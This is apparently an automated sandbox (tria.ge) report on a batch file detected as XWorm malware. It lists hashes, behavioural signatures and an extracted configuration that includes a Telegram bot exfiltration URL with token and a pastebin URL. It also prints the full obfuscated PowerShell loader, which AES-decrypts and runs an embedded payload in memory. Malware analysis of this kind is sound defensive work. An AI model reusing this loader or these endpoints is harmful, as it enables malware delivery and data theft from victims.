Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
max time network
9s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
10/03/2025, 01:38
Static task
static1
General
-
Target
cool.bat
-
Size
86KB
-
MD5
d7b72f5976a6337345c5dd8bfb2b0f50
-
SHA1
a23c01978685db66956720dba87ac61a9ef01855
-
SHA256
db74824e0a5ba395af91902edaa8d61106571a0cb57b71108b5d2fe012b3ad70
-
SHA512
073c341ebb4b51548ebb838d6631c840963522be3162ae5ae73a70cfeb7d2d99415614bf3e60feffe2b7111668912e77a72becf4a51831fff42d961dd798bb42
-
SSDEEP
1536:53jlkY2lec9Gzs6u4cKtVEUXbo/q5VSQm2yBkLKcnaNUCbYYsVyUj67oM85NisWC:53+Y2lMs6tLFboeVSpRkLJaSeyVyHEMw
Malware Config
Extracted
xworm
-
Install_directory
%Temp%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/wXYjM7Vm
-
telegram
https://api.telegram.org/bot7377184900:AAHFDX1FxXhaVcxsJ6GOid3PcOAfkgsfjas/sendMessage?chat_id=6836733049
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4584-27-0x000001EDD1230000-0x000001EDD124A000-memory.dmp family_xworm -
Xworm family
-
Executes dropped EXE 1 IoCs
pid Process 4584 cool.bat.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4584 cool.bat.exe 4584 cool.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4584 cool.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3264 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3764 wrote to memory of 4584 3764 cmd.exe 83 PID 3764 wrote to memory of 4584 3764 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cool.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\cool.bat.exe"cool.bat.exe" -noprofile -executionpolicy bypass -command $jDjyk = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\cool.bat').Split([Environment]::NewLine);$EiVAn = $jDjyk[$jDjyk.Length - 1];$Rgaoo = [System.Convert]::FromBase64String($EiVAn);$CrhTj = New-Object System.Security.Cryptography.AesManaged;$CrhTj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CrhTj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CrhTj.Key = [System.Convert]::FromBase64String('t1fjLII0udRtEfiWpM9W4Cbncb9MnHXMyBPbLRFkYG8=');$CrhTj.IV = [System.Convert]::FromBase64String('3gUtTPQsjtSLngJYOiHrPA==');$UrvZI = $CrhTj.CreateDecryptor();$Rgaoo = $UrvZI.TransformFinalBlock($Rgaoo, 0, $Rgaoo.Length);$UrvZI.Dispose();$CrhTj.Dispose();$FWvUX = New-Object System.IO.MemoryStream(, $Rgaoo);$dzSYh = New-Object System.IO.MemoryStream;$RHedL = New-Object System.IO.Compression.GZipStream($FWvUX, [IO.Compression.CompressionMode]::Decompress);$RHedL.CopyTo($dzSYh);$RHedL.Dispose();$FWvUX.Dispose();$dzSYh.Dispose();$Rgaoo = $dzSYh.ToArray();[System.Reflection.Assembly]::Load($Rgaoo).EntryPoint.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3264
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize23KB
MD55726af350fb53362b67f203382fd2eaa
SHA111f6367d87b92d6c13deed8bc641422d0bcea990
SHA2565423fff1b9a87ffaf764d572000f10ff80994fc8662eeef2e2c55d90f03de93b
SHA512db9afd3bb5a52e8412fd1c6481dcc707269a04655b2528ce2c05282e7f34768e133a393302263ee99c6432ee622f0953360f33b010d5cdb4149422154d36ece7
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize23KB
MD57dc5fb5bb2228ec1072eefcf0126378b
SHA159f3130b632b9807f0fe65d2c57c711409443292
SHA2566cfe370b81a72f38259bf85a77a8fcfa315a61807eadaf7fd7536f7571c47390
SHA512d0c4f4536ed141552883321e4d5ac08b3cafa507ab824b529f650121e542c66d6e0033123fb2aad255f34893d5a0e700ea676f849b7ab8cb6e752a647b726174
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d